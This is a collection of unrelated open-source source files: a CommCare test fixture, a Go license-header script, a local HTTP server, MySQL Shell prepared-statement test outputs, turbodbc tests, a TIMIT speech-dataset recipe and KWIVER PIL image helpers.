name=data['name'],
owner_id=data['owner_id'],
modified_by=data['modified_by'],
modified_on=datetime.utcnow(),
server_modified_on=datetime.utcnow(),
)
cccsql.save()
return cccsql
def _get_form_json():
return {'app_id': 'APP_ID',
'archived': False,
'attachments': {
'form.xml': {
'content_type': 'text/xml',
'length': 10975,
'url': 'https://www.commcarehq.org/a/infomovel-pepfar'
'/api/form/attachment/CONFIDENTIAL/form.xml'
}
},
'build_id': 'BUILD_ID',
'domain': 'infomovel-pepfar',
'edited_by_user_id': None,
'edited_on': None,
'form': {'#type': 'data',
'@name': 'SOME NAME',
'@uiVersion': '1',
'@version': 'VERSION',
'@xmlns': 'http://openrosa.org/formdesigner/IDIDID',
'casa_data': {'convivente_cascade': {},
'conviventes_names': {},
'index_cascade': {},
'save_to_case': {'alocar_paciente_casa': {
'case': {'@case_id': '5ca13e74-8ba3-4d0d-l09j-66371e8895dd',
'@date_modified': '2021-06-24T08:43:06.746000Z',
'@user_id': 'USER ID',
'@xmlns': 'http://commcarehq.org/case/transaction/v2',
'index': {
'parent': {
'#text': '6ca13e74-8ba3-4d0d-l09j-66371e8895dc',
'@case_type': '',
'@relationship': 'child'
}
}}},
'criar_actualizar_casa': {
'case': {'@case_id': '6ca13e74-8ba3-4d0d-l09j-66371e8895dc',
'@date_modified': '2021-05-24T08:43:06.746000Z',
'@user_id': 'USER ID',
'@xmlns': 'http://commcarehq.org/case/transaction/v2',
'create': {'case_name': 'CASE NAME',
'case_type': 'casa',
'owner_id': 'owner_1'},
'update': {
'age_range1': '25-30',
'age_range2': '25-30 anos',
}
}}},
'tb_patient_in_household': '0'},
'case': {'@case_id': '5ca13e74-8ba3-4d0d-l09j-66371e8895dd',
'@date_modified': '2021-06-24T08:43:06.746000Z',
'@user_id': 'USER ID',
'@xmlns': 'http://commcarehq.org/case/transaction/v2',
'update': {'name': '<NAME>'}},
'confirm_info': {},
'confirmar_perfil': {},
'imported_properties': {},
'indicators_v4': {},
'key_workflow_properties': {},
'meta': {},
'patient_data': {}, },
'metadata': {},
}
|
scripts/license.py
|
LiuFang07/bk-cmdb
| 4,695 |
70299
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import getopt
import os
license_content = '''/*
* Tencent is pleased to support the open source community by making 蓝鲸 available.
* Copyright (C) 2017-2018 TH<NAME>, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
* http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under
* the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
* either express or implied. See the License for the specific language governing permissions and
* limitations under the License.
*/
'''
def update_license(target_file, temp_file):
print("update: " + target_file)
with open(target_file, 'r') as src_file, open(temp_file, 'w') as tmp_file:
tmp_file.write(license_content)
is_begin = False
for line in src_file.readlines():
if not is_begin and not line.startswith("package"):
continue
is_begin = True
tmp_file.write(line)
    os.rename(temp_file, target_file)
    os.system("gofmt -w " + target_file + " > /dev/null 2>&1")
def list_dir(target_dir):
list_dirs = os.walk(target_dir)
for root, _, files in list_dirs:
for f in files:
if f.endswith(".go"):
update_license(root+"/"+f, root+"/#"+f)
def main(argv):
inner_dir = ''
try:
opts, _ = getopt.getopt(argv, "hd:", ["help", "dir="])
except getopt.GetoptError:
print('license.py -d <directory>')
sys.exit(2)
if len(opts) == 0:
print('license.py -d <directory>')
sys.exit(2)
for opt, arg in opts:
if opt in ('-h', '--help'):
print('license.py -d <directory>')
sys.exit()
elif opt in ("-d", "--dir"):
inner_dir = arg
list_dir(os.path.abspath(inner_dir))
if __name__ == "__main__":
main(sys.argv[1:])
|
RecoPPS/Local/python/PPSTimingCalibrationModeEnum_cff.py
|
ckamtsikis/cmssw
| 852 |
70319
|
class PPSTimingCalibrationModeEnum:
CondDB = 0
JSON = 1
SQLite = 2
|
httpd.py
|
bshah2016/web-processing
| 250 |
70335
|
#!/usr/bin/env python
PORT = 9914
SERVER = '127.0.0.1'
import SimpleHTTPServer
import BaseHTTPServer
import SocketServer
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
class Server(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
pass
httpd = Server((SERVER, PORT), Handler)
print "Web Server listening on http://%s:%s/ (stop with ctrl+c)..." % (SERVER, PORT)
try:
httpd.serve_forever()
except KeyboardInterrupt:
print "Going down..."
|
unittest/scripts/py_devapi/validation/mysqlx_collection_remove_prepared.py
|
mueller/mysql-shell
| 119 |
70348
|
#@<PROTOCOL> First execution is normal
>>>> SEND Mysqlx.Crud.Delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
}
#@<OUT> First execution is normal
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Second execution prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 1
stmt {
type: DELETE
delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 1
}
#@<OUT> Second execution prepares statement and executes it
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Third execution uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 1
}
#@<OUT> Third execution uses prepared statement
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> sort() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 1
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
}
#@<OUT> sort() changes statement, back to normal execution
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> second execution after sort(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 2
stmt {
type: DELETE
delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 2
}
#@<OUT> second execution after sort(), prepares statement and executes it
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> third execution after set(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 2
}
#@<OUT> third execution after set(), uses prepared statement
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> limit() changes statement, back to normal execution
>>>> SEND Mysqlx.Prepare.Deallocate {
stmt_id: 2
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Crud.Delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
limit {
row_count: 1
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
}
#@<OUT> limit() changes statement, back to normal execution
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> second execution after limit(), prepares statement and executes it
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 3
stmt {
type: DELETE
delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "=="
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: LITERAL
literal {
type: V_OCTETS
v_octets {
value: "001"
}
}
}
}
}
order {
expr {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "name"
}
}
}
direction: DESC
}
limit_expr {
row_count {
type: PLACEHOLDER
position: 0
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 3
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> second execution after limit(), prepares statement and executes it
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> third execution after limit(), uses prepared statement
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 3
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> third execution after limit(), uses prepared statement
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Prepares statement to test re-usability of bind() and limit()
>>>> SEND Mysqlx.Crud.Delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "like"
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: PLACEHOLDER
position: 0
}
}
}
limit {
row_count: 1
}
args {
type: V_STRING
v_string {
value: "001"
}
}
}
#@<OUT> Prepares statement to test re-usability of bind() and limit()
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Prepares and executes statement
>>>> SEND Mysqlx.Prepare.Prepare {
stmt_id: 4
stmt {
type: DELETE
delete {
collection {
name: "test_collection"
schema: "prepared_stmt"
}
data_model: DOCUMENT
criteria {
type: OPERATOR
operator {
name: "like"
param {
type: IDENT
identifier {
document_path {
type: MEMBER
value: "_id"
}
}
}
param {
type: PLACEHOLDER
position: 0
}
}
}
limit_expr {
row_count {
type: PLACEHOLDER
position: 1
}
}
}
}
}
<<<< RECEIVE Mysqlx.Ok {
}
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "002"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> Prepares and executes statement
Query OK, 1 item affected ([[*]] sec)
{
"_id": "001",
"age": 18,
"name": "george"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Executes prepared statement with bind()
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "003"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> Executes prepared statement with bind()
Query OK, 1 item affected ([[*]] sec)
{
"_id": "001",
"age": 18,
"name": "george"
}
{
"_id": "002",
"age": 17,
"name": "james"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Executes prepared statement with limit(1)
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "%"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 1
}
}
}
#@<OUT> Executes prepared statement with limit(1)
Query OK, 1 item affected ([[*]] sec)
{
"_id": "002",
"age": 17,
"name": "james"
}
{
"_id": "003",
"age": 18,
"name": "luke"
}
2 documents in set ([[*]] sec)
Query OK, 1 item affected ([[*]] sec)
#@<PROTOCOL> Executes prepared statement with limit(2)
>>>> SEND Mysqlx.Prepare.Execute {
stmt_id: 4
args {
type: SCALAR
scalar {
type: V_STRING
v_string {
value: "%"
}
}
}
args {
type: SCALAR
scalar {
type: V_UINT
v_unsigned_int: 2
}
}
}
#@<OUT> Executes prepared statement with limit(2)
Query OK, 2 items affected ([[*]] sec)
{
"_id": "003",
"age": 18,
"name": "luke"
}
1 document in set ([[*]] sec)
|
python/turbodbc_test/test_data_types.py
|
arikfr/turbodbc
| 537 |
70355
|
import turbodbc.data_types
from turbodbc import STRING, BINARY, NUMBER, DATETIME, ROWID
ALL_TYPE_CODES = [turbodbc.data_types._BOOLEAN_CODE,
turbodbc.data_types._INTEGER_CODE,
turbodbc.data_types._FLOATING_POINT_CODE,
turbodbc.data_types._STRING_CODE,
turbodbc.data_types._UNICODE_CODE,
turbodbc.data_types._TIMESTAMP_CODE,
turbodbc.data_types._DATE_CODE]
ALL_DATA_TYPES = [STRING, BINARY, NUMBER, DATETIME, ROWID]
def test_each_type_code_matches_one_data_type():
for type_code in ALL_TYPE_CODES:
matches = [type for type in ALL_DATA_TYPES if type_code == type]
assert 1 == len(matches)
def test_each_type_code_mismatches_all_but_one_data_type():
for type_code in ALL_TYPE_CODES:
mismatches = [type for type in ALL_DATA_TYPES if type_code != type]
expected = len(ALL_DATA_TYPES) - 1
assert expected == len(mismatches)
|
lhotse/recipes/timit.py
|
stachu86/lhotse
| 353 |
70365
|
<filename>lhotse/recipes/timit.py
#!/usr/bin/env python3
# Copyright 2021 Xiaomi Corporation (Author: <NAME>)
# Apache 2.0
import glob
import logging
import zipfile
from collections import defaultdict
from concurrent.futures.thread import ThreadPoolExecutor
from pathlib import Path
from typing import Dict, Optional, Union
from tqdm import tqdm
from lhotse import validate_recordings_and_supervisions
from lhotse.audio import Recording, RecordingSet
from lhotse.supervision import SupervisionSegment, SupervisionSet
from lhotse.utils import Pathlike, urlretrieve_progress
def download_timit(
target_dir: Pathlike = ".",
force_download: bool = False,
base_url: Optional[str] = "https://data.deepai.org/timit.zip",
) -> None:
"""
Download and unzip the dataset TIMIT.
:param target_dir: Pathlike, the path of the dir to store the dataset.
:param force_download: bool, if True, download the zips no matter if the zips exists.
:param base_url: str, the URL of the TIMIT dataset to download.
"""
target_dir = Path(target_dir)
target_dir.mkdir(parents=True, exist_ok=True)
zip_name = "timit.zip"
zip_path = target_dir / zip_name
corpus_dir = zip_path.with_suffix("")
completed_detector = corpus_dir / ".completed"
if completed_detector.is_file():
logging.info(f"Skipping {zip_name} because {completed_detector} exists.")
return
if force_download or not zip_path.is_file():
urlretrieve_progress(
base_url, filename=zip_path, desc=f"Downloading {zip_name}"
)
with zipfile.ZipFile(zip_path) as zip_file:
corpus_dir.mkdir(parents=True, exist_ok=True)
for names in zip_file.namelist():
zip_file.extract(names, str(corpus_dir))
def prepare_timit(
corpus_dir: Pathlike,
output_dir: Optional[Pathlike] = None,
num_phones: int = 48,
num_jobs: int = 1,
) -> Dict[str, Dict[str, Union[RecordingSet, SupervisionSet]]]:
"""
    Returns the manifests, which consist of the Recordings and Supervisions.
:param corpus_dir: Pathlike, the path of the data dir.
:param output_dir: Pathlike, the path where to write and save the manifests.
    :param num_phones: int=48, the number of phones (60, 48 or 39) used for modeling; 48 is the default value.
    :return: a Dict whose key is the dataset part, and the value is Dicts with the keys 'recordings' and 'supervisions'.
"""
corpus_dir = Path(corpus_dir)
assert corpus_dir.is_dir(), f"No such directory: {corpus_dir}"
if output_dir is not None:
output_dir = Path(output_dir)
output_dir.mkdir(parents=True, exist_ok=True)
manifests = defaultdict(dict)
dataset_parts = ["TRAIN", "DEV", "TEST"]
phones_dict = {}
if num_phones in [60, 48, 39]:
phones_dict = get_phonemes(num_phones)
else:
raise ValueError("The value of num_phones must be in [60, 48, 39].")
dev_spks, test_spks = get_speakers()
with ThreadPoolExecutor(num_jobs) as ex:
for part in dataset_parts:
wav_files = []
if part == "TRAIN":
print("starting....")
wav_files = glob.glob(str(corpus_dir) + "/TRAIN/*/*/*.WAV")
# filter the SA (dialect sentences)
wav_files = list(
filter(lambda x: x.split("/")[-1][:2] != "SA", wav_files)
)
elif part == "DEV":
wav_files = glob.glob(str(corpus_dir) + "/TEST/*/*/*.WAV")
# filter the SA (dialect sentences)
wav_files = list(
filter(lambda x: x.split("/")[-1][:2] != "SA", wav_files)
)
wav_files = list(
filter(lambda x: x.split("/")[-2].lower() in dev_spks, wav_files)
)
else:
wav_files = glob.glob(str(corpus_dir) + "/TEST/*/*/*.WAV")
# filter the SA (dialect sentences)
wav_files = list(
filter(lambda x: x.split("/")[-1][:2] != "SA", wav_files)
)
wav_files = list(
filter(lambda x: x.split("/")[-2].lower() in test_spks, wav_files)
)
logging.debug(f"{part} dataset manifest generation.")
recordings = []
supervisions = []
for wav_file in tqdm(wav_files):
items = str(wav_file).strip().split("/")
idx = items[-2] + "-" + items[-1][:-4]
speaker = items[-2]
transcript_file = Path(wav_file).with_suffix(".PHN")
if not Path(wav_file).is_file():
logging.warning(f"No such file: {wav_file}")
continue
if not Path(transcript_file).is_file():
logging.warning(f"No transcript: {transcript_file}")
continue
text = []
with open(transcript_file, "r") as f:
lines = f.readlines()
for line in lines:
phone = line.rstrip("\n").split(" ")[-1]
if num_phones != 60:
phone = phones_dict[str(phone)]
text.append(phone)
text = " ".join(text).replace("h#", "sil")
recording = Recording.from_file(path=wav_file, recording_id=idx)
recordings.append(recording)
segment = SupervisionSegment(
id=idx,
recording_id=idx,
start=0.0,
duration=recording.duration,
channel=0,
language="English",
speaker=speaker,
text=text.strip(),
)
supervisions.append(segment)
recording_set = RecordingSet.from_recordings(recordings)
supervision_set = SupervisionSet.from_segments(supervisions)
validate_recordings_and_supervisions(recording_set, supervision_set)
if output_dir is not None:
supervision_set.to_json(output_dir / f"supervisions_{part}.json")
recording_set.to_json(output_dir / f"recordings_{part}.json")
manifests[part] = {
"recordings": recording_set,
"supervisions": supervision_set,
}
return manifests
def get_phonemes(num_phones):
"""
Choose and convert the phones for modeling.
:param num_phones: the number of phones for modeling.
"""
phonemes = {}
if num_phones == int(48):
logging.debug("Using 48 phones for modeling!")
# This dictionary is used to convert the 60 phoneme set into the 48 one.
phonemes["sil"] = "sil"
phonemes["aa"] = "aa"
phonemes["ae"] = "ae"
phonemes["ah"] = "ah"
phonemes["ao"] = "ao"
phonemes["aw"] = "aw"
phonemes["ax"] = "ax"
phonemes["ax-h"] = "ax"
phonemes["axr"] = "er"
phonemes["ay"] = "ay"
phonemes["b"] = "b"
phonemes["bcl"] = "vcl"
phonemes["ch"] = "ch"
phonemes["d"] = "d"
phonemes["dcl"] = "vcl"
phonemes["dh"] = "dh"
phonemes["dx"] = "dx"
phonemes["eh"] = "eh"
phonemes["el"] = "el"
phonemes["em"] = "m"
phonemes["en"] = "en"
phonemes["eng"] = "ng"
phonemes["epi"] = "epi"
phonemes["er"] = "er"
phonemes["ey"] = "ey"
phonemes["f"] = "f"
phonemes["g"] = "g"
phonemes["gcl"] = "vcl"
phonemes["h#"] = "sil"
phonemes["hh"] = "hh"
phonemes["hv"] = "hh"
phonemes["ih"] = "ih"
phonemes["ix"] = "ix"
phonemes["iy"] = "iy"
phonemes["jh"] = "jh"
phonemes["k"] = "k"
phonemes["kcl"] = "cl"
phonemes["l"] = "l"
phonemes["m"] = "m"
phonemes["n"] = "n"
phonemes["ng"] = "ng"
phonemes["nx"] = "n"
phonemes["ow"] = "ow"
phonemes["oy"] = "oy"
phonemes["p"] = "p"
phonemes["pau"] = "sil"
phonemes["pcl"] = "cl"
phonemes["q"] = ""
phonemes["r"] = "r"
phonemes["s"] = "s"
phonemes["sh"] = "sh"
phonemes["t"] = "t"
phonemes["tcl"] = "cl"
phonemes["th"] = "th"
phonemes["uh"] = "uh"
phonemes["uw"] = "uw"
phonemes["ux"] = "uw"
phonemes["v"] = "v"
phonemes["w"] = "w"
phonemes["y"] = "y"
phonemes["z"] = "z"
phonemes["zh"] = "zh"
elif num_phones == int(39):
logging.debug("Using 39 phones for modeling!")
# This dictionary is used to convert the 60 phoneme set into the 39 one.
phonemes["sil"] = "sil"
phonemes["aa"] = "aa"
phonemes["ae"] = "ae"
phonemes["ah"] = "ah"
phonemes["ao"] = "aa"
phonemes["aw"] = "aw"
phonemes["ax"] = "ah"
phonemes["ax-h"] = "ah"
phonemes["axr"] = "er"
phonemes["ay"] = "ay"
phonemes["b"] = "b"
phonemes["bcl"] = "sil"
phonemes["ch"] = "ch"
phonemes["d"] = "d"
phonemes["dcl"] = "sil"
phonemes["dh"] = "dh"
phonemes["dx"] = "dx"
phonemes["eh"] = "eh"
phonemes["el"] = "l"
phonemes["em"] = "m"
phonemes["en"] = "n"
phonemes["eng"] = "ng"
phonemes["epi"] = "sil"
phonemes["er"] = "er"
phonemes["ey"] = "ey"
phonemes["f"] = "f"
phonemes["g"] = "g"
phonemes["gcl"] = "sil"
phonemes["h#"] = "sil"
phonemes["hh"] = "hh"
phonemes["hv"] = "hh"
phonemes["ih"] = "ih"
phonemes["ix"] = "ih"
phonemes["iy"] = "iy"
phonemes["jh"] = "jh"
phonemes["k"] = "k"
phonemes["kcl"] = "sil"
phonemes["l"] = "l"
phonemes["m"] = "m"
phonemes["ng"] = "ng"
phonemes["n"] = "n"
phonemes["nx"] = "n"
phonemes["ow"] = "ow"
phonemes["oy"] = "oy"
phonemes["p"] = "p"
phonemes["pau"] = "sil"
phonemes["pcl"] = "sil"
phonemes["q"] = ""
phonemes["r"] = "r"
phonemes["s"] = "s"
phonemes["sh"] = "sh"
phonemes["t"] = "t"
phonemes["tcl"] = "sil"
phonemes["th"] = "th"
phonemes["uh"] = "uh"
phonemes["uw"] = "uw"
phonemes["ux"] = "uw"
phonemes["v"] = "v"
phonemes["w"] = "w"
phonemes["y"] = "y"
phonemes["z"] = "z"
phonemes["zh"] = "sh"
else:
logging.debug("Using 60 phones for modeling!")
return phonemes
def get_speakers():
# List of test speakers
test_spk = [
"fdhc0",
"felc0",
"fjlm0",
"fmgd0",
"fmld0",
"fnlp0",
"fpas0",
"fpkt0",
"mbpm0",
"mcmj0",
"mdab0",
"mgrt0",
"mjdh0",
"mjln0",
"mjmp0",
"mklt0",
"mlll0",
"mlnt0",
"mnjm0",
"mpam0",
"mtas1",
"mtls0",
"mwbt0",
"mwew0",
]
# List of dev speakers
dev_spk = [
"fadg0",
"faks0",
"fcal1",
"fcmh0",
"fdac1",
"fdms0",
"fdrw0",
"fedw0",
"fgjd0",
"fjem0",
"fjmg0",
"fjsj0",
"fkms0",
"fmah0",
"fmml0",
"fnmr0",
"frew0",
"fsem0",
"majc0",
"mbdg0",
"mbns0",
"mbwm0",
"mcsh0",
"mdlf0",
"mdls0",
"mdvc0",
"mers0",
"mgjf0",
"mglb0",
"mgwt0",
"mjar0",
"mjfc0",
"mjsw0",
"mmdb1",
"mmdm2",
"mmjr0",
"mmwh0",
"mpdf0",
"mrcs0",
"mreb0",
"mrjm4",
"mrjr0",
"mroa0",
"mrtk0",
"mrws1",
"mtaa0",
"mtdt0",
"mteb0",
"mthc0",
"mwjg0",
]
return dev_spk, test_spk
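# Hedged usage sketch (an added example; the extracted corpus path below is an
# assumption that depends on the layout of the downloaded archive):
#   download_timit("corpora")
#   manifests = prepare_timit("corpora/timit/data", output_dir="manifests", num_phones=48)
#   train_recordings = manifests["TRAIN"]["recordings"]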
|
python/kwiver/vital/util/VitalPIL.py
|
mwoehlke-kitware/kwiver
| 176 |
70383
|
"""
ckwg +31
Copyright 2017 by Kitware, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither name of Kitware, Inc. nor the names of any contributors may be used
to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
==============================================================================
Helper functions for dealing with PIL
"""
from kwiver.vital.types import Image
import six
def _pil_image_to_bytes(p_img):
"""
Get the component bytes from the given PIL Image.
    In recent versions of PIL, the tobytes function is the correct thing to
call, but some older versions of PIL do not have this function.
:param p_img: PIL Image to get the bytes from.
:type p_img: PIL.Image.Image
:returns: Byte string.
:rtype: bytes
"""
if hasattr(p_img, 'tobytes'):
return p_img.tobytes()
else:
# Older version of the function.
return p_img.tostring()
def _pil_image_from_bytes(mode, size, data, decoder_name='raw', *args):
"""
Creates a copy of an image memory from pixel data in a buffer.
    In recent versions of PIL, the frombytes function is the correct thing to
    call, but older versions of PIL only have fromstring, which is equivalent
    in function.
:param mode: The image mode. See: :ref:`concept-modes`.
:param size: The image size.
:param data: A byte buffer containing raw data for the given mode.
:param decoder_name: What decoder to use.
:param args: Additional parameters for the given decoder.
:returns: An :py:class:`~PIL.Image.Image` object.
"""
import PIL.Image
if hasattr(PIL.Image, 'frombytes'):
return PIL.Image.frombytes(mode, size, data, decoder_name, *args)
else:
return PIL.Image.fromstring(mode, size, data, decoder_name, *args)
def from_pil(pil_image):
"""
Construct Image from supplied PIL image object.
:param pil_image: PIL image object
:type pil_image: PIL.Image.Image
:raises RuntimeError: If the PIL Image provided is not in a recognized
mode.
:returns: New Image instance using the given image's pixels.
:rtype: Image
"""
(img_width, img_height) = pil_image.size
mode = pil_image.mode
# TODO(paul.tunison): Extract this logic out into a utility function.
if mode == "1": # boolean
img_depth = 1
img_w_step = 1
img_h_step = img_width
img_d_step = 0
img_pix_num_bytes = 1
img_pix_type = Image.PIXEL_BOOL
elif mode == "L": # 8-bit greyscale
img_depth = 1
img_w_step = 1
img_h_step = img_width
img_d_step = 0
img_pix_num_bytes = 1
img_pix_type = Image.PIXEL_UNSIGNED
elif mode == "RGB": # 8-bit RGB
img_depth = 3
img_w_step = 3
img_h_step = img_width * 3
img_d_step = 1
img_pix_num_bytes = 1
img_pix_type = Image.PIXEL_UNSIGNED
elif mode == "RGBA": # 8-bit RGB with alpha
img_depth = 4
img_w_step = 4
img_h_step = img_width * 4
img_d_step = 1
img_pix_num_bytes = 1
img_pix_type = Image.PIXEL_UNSIGNED
elif mode == "I": # 32-bit signed int greyscale
img_depth = 1
img_w_step = 1
img_h_step = img_width
img_d_step = 0
img_pix_num_bytes = 4
img_pix_type = Image.PIXEL_SIGNED
elif mode == "F": # 32-bit float greyscale
img_depth = 1
img_w_step = 1
img_h_step = img_width
img_d_step = 0
img_pix_num_bytes = 4
img_pix_type = Image.PIXEL_FLOAT
else:
raise RuntimeError("Unsupported image format.")
img_data = _pil_image_to_bytes(pil_image)
vital_img = Image(img_data,
img_width, img_height, img_depth,
img_w_step, img_h_step, img_d_step,
img_pix_type, img_pix_num_bytes)
return vital_img
